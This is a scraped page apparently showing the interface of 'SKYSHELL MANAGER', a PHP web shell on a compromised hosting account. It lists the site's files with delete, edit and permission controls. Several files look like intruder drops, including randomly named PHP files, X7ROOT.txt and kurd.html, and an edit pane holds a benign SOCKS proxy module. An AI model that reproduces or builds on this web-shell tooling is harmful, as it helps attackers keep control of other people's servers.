📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.38 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: index.js
/** * Module dependencies. */ var tls; // lazy-loaded... var url = require('url'); var dns = require('dns'); var Agent = require('agent-base'); var SocksClient = require('socks').SocksClient; var inherits = require('util').inherits; /** * Module exports. */ module.exports = SocksProxyAgent; /** * The `SocksProxyAgent`. * * @api public */ function SocksProxyAgent(opts) { if (!(this instanceof SocksProxyAgent)) return new SocksProxyAgent(opts); if ('string' == typeof opts) opts = url.parse(opts); if (!opts) throw new Error( 'a SOCKS proxy server `host` and `port` must be specified!' ); Agent.call(this, opts); var proxy = Object.assign({}, opts); // prefer `hostname` over `host`, because of `url.parse()` proxy.host = proxy.hostname || proxy.host; // SOCKS doesn't *technically* have a default port, but this is // the same default that `curl(1)` uses proxy.port = +proxy.port || 1080; if (proxy.host && proxy.path) { // if both a `host` and `path` are specified then it's most likely the // result of a `url.parse()` call... we need to remove the `path` portion so // that `net.connect()` doesn't attempt to open that as a unix socket file. delete proxy.path; delete proxy.pathname; } // figure out if we want socks v4 or v5, based on the "protocol" used. // Defaults to 5. proxy.lookup = false; switch (proxy.protocol) { case 'socks4:': proxy.lookup = true; // pass through case 'socks4a:': proxy.version = 4; break; case 'socks5:': proxy.lookup = true; // pass through case 'socks:': // no version specified, default to 5h case 'socks5h:': proxy.version = 5; break; default: throw new TypeError( 'A "socks" protocol must be specified! Got: ' + proxy.protocol ); } if (proxy.auth) { var auth = proxy.auth.split(':'); proxy.authentication = { username: auth[0], password: auth[1] }; proxy.userid = auth[0]; } this.proxy = proxy; } inherits(SocksProxyAgent, Agent); /** * Initiates a SOCKS connection to the specified SOCKS proxy server, * which in turn connects to the specified remote host and port. * * @api public */ SocksProxyAgent.prototype.callback = function connect(req, opts, fn) { var proxy = this.proxy; // called once the SOCKS proxy has connected to the specified remote endpoint function onhostconnect(err, result) { if (err) return fn(err); var socket = result.socket; var s = socket; if (opts.secureEndpoint) { // since the proxy is connecting to an SSL server, we have // to upgrade this socket connection to an SSL connection if (!tls) tls = require('tls'); opts.socket = socket; opts.servername = opts.host; opts.host = null; opts.hostname = null; opts.port = null; s = tls.connect(opts); } fn(null, s); } // called for the `dns.lookup()` callback function onlookup(err, ip) { if (err) return fn(err); options.destination.host = ip; SocksClient.createConnection(options, onhostconnect); } var options = { proxy: { ipaddress: proxy.host, port: +proxy.port, type: proxy.version }, destination: { port: +opts.port }, command: 'connect' }; if (proxy.authentication) { options.proxy.userId = proxy.userid; options.proxy.password = proxy.authentication.password; } if (proxy.lookup) { // client-side DNS resolution for "4" and "5" socks proxy versions dns.lookup(opts.host, onlookup); } else { // proxy hostname DNS resolution for "4a" and "5h" socks proxy servers onlookup(null, opts.host); } }
Save